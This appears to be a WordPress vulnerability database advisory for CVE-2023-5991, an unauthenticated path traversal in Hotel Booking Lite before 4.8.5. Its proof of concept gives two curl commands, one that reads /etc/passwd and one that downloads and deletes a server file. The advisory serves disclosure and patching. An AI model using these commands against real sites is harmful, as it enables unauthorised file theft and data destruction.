WordPress Plugin Vulnerabilities

Hotel Booking Lite < 4.8.5 - Unauthenticated Arbitrary File Download & Deletion

Description

The plugins do not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server

Proof of Concept

To download /etc/passwd: curl 'https://example.com/?filename=../../../../../../etc/passwd&mphb_action=download'

To download and delete the /wp-content/uploads/delete-me.php file: curl 'https://example.com/?filename=../delete-me.php&mphb_action=download&remove=1'

Affects Plugins

Plugin icon
motopress-hotel-booking-lite
Fixed in 4.8.5
Plugin icon
motopress-hotel-booking
Fixed in 4.8.5

References

CVE
CVE-2023-5991

Classification

Type
TRAVERSAL
OWASP top 10
A1: Injection
CWE
CWE-22

Miscellaneous

Original Researcher
Krzysztof Zając (CERT PL)
Submitter
Krzysztof Zając (CERT PL)
Submitter website
https://cert.pl
Submitter twitter
cert_polska_en
Verified
Yes
WPVDB ID
e9d35e36-1e60-4483-b8b3-5cbf08fcd49e

Timeline

Publicly Published
2023-12-01 (about 5 months ago)
Added
2023-12-01 (about 5 months ago)
Last Updated
2024-05-07 (about 5 days ago)

Other

Published
Title
Published
2021-09-02
Title
Simple Download Monitor < 3.9.5 - Contributor+ Arbitrary File Download via Path Traversal
Published
2022-10-28
Title
Ultimate Member < 2.5.1 - Contributor+ LFI via Traversal
Published
2021-07-18
Title
Photo Gallery < 1.5.75 - File Upload Path Traversal
Published
2017-09-29
Title
Insert Pages < 3.2.4 - Directory Traversal
Published
2021-12-01
Title
CAOS < 4.1.9 - Admin+ Arbitrary Folder Deletion via Path Traversal